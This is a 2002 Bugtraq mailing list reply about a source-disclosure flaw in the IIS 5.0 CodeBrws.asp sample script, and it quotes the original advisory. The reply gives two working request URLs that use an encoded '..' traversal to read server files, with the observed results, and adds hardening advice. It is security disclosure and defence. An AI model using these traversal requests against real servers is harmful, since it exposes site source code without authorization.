Bugtraq mailing list archives
RE: Microsoft IIS 5.0 CodeBrws.asp Source Disclosure
From: "Randy Hinders" <rahinders () hotmail com>
Date: Wed, 17 Apr 2002 08:25:27 -0400
While checking various files and extensions I wanted to ensure that other files were still "protected" from this. I was not able to read the global.asa but was able to read (as expected) other asp pages..
http://localhost//iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/global.asa Returned "View Active Server Page Source-- Access Denied" to the browser. http://localhost//iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/iisstart.asp Returned the source code to the browser.Yes, the IISSAMPLES and all other SDK items should never be installed on a production machine, but should a client upload this code to a shared hosting environment where the global.asa is properly protected with NTFS permissions they will not be able to gain access to the source code through this method.
HTH Randy Hinders MCT (ret.), MCSE, MCP +I & A+ NT Systems Administrator DONet, Inc www.donet.com www.adsi4nt.com ~~Hoka Hey, Lakotas~~ -----Original Message----- From: H D Moore [mailto:sflist () digitaloffense net] Sent: Tuesday, April 16, 2002 11:01 PM To: bugtraq () securityfocus com Cc: vulnwatch () vulnwatch org Subject: Microsoft IIS 5.0 CodeBrws.asp Source Disclosure --[ Microsoft IIS 5.0 CodeBrws.asp Source Disclosure Summary: Microsoft's IIS 5.0 web server is shipped with a set of sample files to demonstrate different features of the ASP language. One of these sample files allows a remote user to view the source of any file in the web root with the extension .asp, .inc, .htm, or .html. The IISSamples virtual directory should not be left on production servers in the first place, but until now there were no serious[1] vulnerabilities found in those sample scripts. Microsoft was _not_ contacted about this, they can read the lists like everyone else. This is an issue that can be fixed by proper system administration. <snip> _________________________________________________________________ Chat with friends online, try MSN Messenger: http://messenger.msn.com
Current thread:
- Microsoft IIS 5.0 CodeBrws.asp Source Disclosure H D Moore (Apr 17)
- Re: Microsoft IIS 5.0 CodeBrws.asp Source Disclosure Joe Testa (Apr 17)
- <Possible follow-ups>
- RE: Microsoft IIS 5.0 CodeBrws.asp Source Disclosure Randy Hinders (Apr 17)
- Re: Microsoft IIS 5.0 CodeBrws.asp Source Disclosure H D Moore (Apr 17)
- Re: Microsoft IIS 5.0 CodeBrws.asp Source Disclosure Chris Anley (Apr 18)
- Re: Microsoft IIS 5.0 CodeBrws.asp Source Disclosure H D Moore (Apr 17)